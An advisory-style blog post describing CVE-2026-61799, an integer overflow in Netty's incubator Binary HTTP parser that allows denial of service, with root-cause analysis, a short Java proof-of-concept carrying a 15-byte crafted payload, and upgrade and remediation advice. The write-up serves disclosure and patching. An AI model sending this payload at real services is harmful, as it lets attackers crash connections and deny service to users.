Netty, Integer Overflow leading to DoS, CVE-2026-61799 (Medium) -DC-Aug2026-1712

Listen to this Post

The vulnerability exists in the `io.netty.incubator:netty-incubator-codec-bhttp` library, specifically within the `BinaryHttpParser` class used for decoding Binary HTTP (BHTTP) messages. The root cause is an unsafe type conversion when processing attacker-controlled variable-length integers, as defined in the Binary HTTP specification.
In the `BinaryHttpParser.java` file, the parser maintains cumulative byte offsets using an `int` variable named sumBytes. When processing various parts of a BHTTP message, such as the request method length or header field lengths, the parser reads these lengths as `long` values from the input. It then adds this `long` length to the `int` offset using a compound assignment operation (sumBytes += methodLength).
In Java, this operation performs a narrowing primitive conversion, silently discarding the high-order bits of the `long` value to fit it into the `int` variable. A remote attacker can exploit this by sending a valid varint that encodes a length of `2^31` (2,147,483,648). When this `long` value is added to the `int` offset, it overflows and wraps around to a large negative number.
This negative value is then used in a bounds check like if (sumBytes >= in.readableBytes()) return null. Since the attacker-controlled `sumBytes` is now negative, this check is bypassed. The parser subsequently computes a buffer index by adding the negative `sumBytes` to the current reader index (in.readerIndex() + sumBytes), leading to an `ArrayIndexOutOfBoundsException` or `IndexOutOfBoundsException` when attempting to read from that invalid index.
This pattern of unsafe `int` accumulation from `long` lengths is present in several critical parser paths, including the request head parsing (readRequestHead), header line parsing (readFieldLine), and indeterminate length parsing (getIndeterminateLength). The failure is triggered by a very small, malformed BHTTP payload, making it easy for an attacker to cause a denial-of-service condition.

DailyCVE Form:

Platform: Netty
Version: <=0.0.22.Final
Vulnerability: Integer Overflow
Severity: Medium
date: 2026-08-21

Prediction: 2026-08-22

What Undercode Say:

Analytics show the overflow is triggered by a valid 8-byte varint encoding of `0x80000000` (2^31), causing `sumBytes` to wrap negative and bypass bounds checks. This leads to an unhandled exception and connection termination.

Exploit: (Educational Purposes!)

To reproduce, compile the `codec-bhttp` module and run this verifier with a 15-byte payload:

import io.netty.buffer.ByteBuf;
import io.netty.buffer.Unpooled;
import io.netty.incubator.codec.bhttp.BinaryHttpParser;
public final class VerifyBhttpOverflow {
public static void main(String[] args) {
byte[] payload = new byte[] {
0x00, (byte)0xc0, 0x00, 0x00, 0x00, (byte)0x80, 0x00, 0x00, 0x00,
0x47, 0x45, 0x54, 0x58, 0x58, 0x58
};
ByteBuf input = Unpooled.wrappedBuffer(payload);
try {
new BinaryHttpParser(8192).parse(input, false);
System.out.println("returned");
} catch (Throwable t) {
System.out.println(t.getClass().getName());
System.out.println(t.getMessage());
}
}
}

The payload’s `c000000080000000` bytes are a valid varint encoding of 0x80000000, which overflows the offset and produces an exception like java.lang.ArrayIndexOutOfBoundsException: Index -2147483639 out of bounds for length 15.

Protection:

Upgrade to version `0.0.23.Final` or later. If upgrading is not possible, apply the suggested remediation: use `long` for all cumulative byte counts, validate that protocol lengths are non-negative and within Integer.MAX_VALUE, and throw a controlled exception like `CorruptedFrameException` for invalid lengths.

Impact:

A remote, unauthenticated attacker can send a tiny malformed BHTTP payload to trigger an unchecked exception. In typical Netty pipelines, this crashes or closes the affected channel. Repeated exploitation can lead to a sustained denial-of-service (DoS) condition for any service exposing the `BinaryHttpParser` or `BinaryHttpDecoder` to untrusted input. No memory corruption or information disclosure has been observed.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top